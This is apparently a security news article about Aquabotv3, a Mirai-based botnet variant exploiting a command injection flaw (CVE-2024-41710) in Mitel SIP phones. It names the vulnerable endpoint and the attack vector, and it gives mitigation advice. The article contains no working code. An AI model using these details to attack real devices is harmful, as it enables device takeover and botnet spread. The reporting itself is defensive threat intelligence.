A new variant of the Mirai-based malware, dubbed Aquabotv3, has been identified by the Akamai Security Intelligence and Response Team (SIRT).
This malware is actively exploiting a command injection vulnerability in Mitel SIP phones to execute malicious commands and propagate itself across networks.
This marks a concerning evolution in botnet capabilities, as Aquabotv3 introduces novel features not previously observed in Mirai variants.
The attack leverages CVE-2024-41710, a critical command injection vulnerability affecting Mitel 6800, 6900, and 6900w series SIP phones, including the 6970 Conference Unit running firmware R6.4.0.HF1 or earlier.
The flaw arises from improper input sanitization in the web administration interface, allowing attackers to inject arbitrary commands via specially crafted HTTP POST requests.
This vulnerability enables attackers to gain root access to the device, manipulate configuration files, and execute malicious scripts during the device’s boot process.
While analysts at Akamai identified a proof-of-concept (PoC) exploit that demonstrated how attackers could use this flaw to smuggle commands through unsanitized inputs.
For instance, targeting the endpoint /8021xsupport.html, attackers can modify local configuration files and execute shell scripts during startup.
Early January 2025 saw active exploitation of this vulnerability in the wild, with attackers deploying payloads to fetch and execute Mirai-based malware binaries across multiple architectures (x86, ARM).
Integrating Application Security into Your CI/CD Workflows Using Jenkins & Jira -> Free Webinar
Aquabotv3: A New Threat
Aquabotv3 distinguishes itself from earlier Aquabot variants by incorporating a unique function called report_kill().
%20function%20sending%20kill%20attempts%20to%20the%20C2%20(Source%20-%20Akamai).webp)
This feature allows the malware to notify its command-and-control (C2) server whenever it detects termination signals (SIGTERM or SIGKILL). While this behavior’s purpose remains unclear, it may enable threat actors to monitor botnet health or adapt their tactics against defensive measures.
.webp)
The malware retains traditional Mirai functionalities such as distributed denial-of-service (DDoS) attacks but also includes obfuscation techniques for persistence.
.webp)
For example, it renames itself to mimic legitimate processes like “httpd.x86” and establishes communication with C2 servers over specific ports.
In addition to targeting Mitel SIP phones, Aquabotv3 exploits other vulnerabilities to expand its reach.
These include Hadoop YARN (CVE-2018-17532), Linksys E-series RCE (CVE-2018-10562), and others.
Organizations using Mitel SIP phones are urged to:-
- Apply firmware updates addressing CVE-2024-41710.
- Implement network segmentation to isolate vulnerable devices.
- Monitor for indicators of compromise (IoCs), such as outbound traffic to known malicious IPs or domains.
Collect Threat Intelligence with TI Lookup to improve your company’s security - Get 50 Free Request
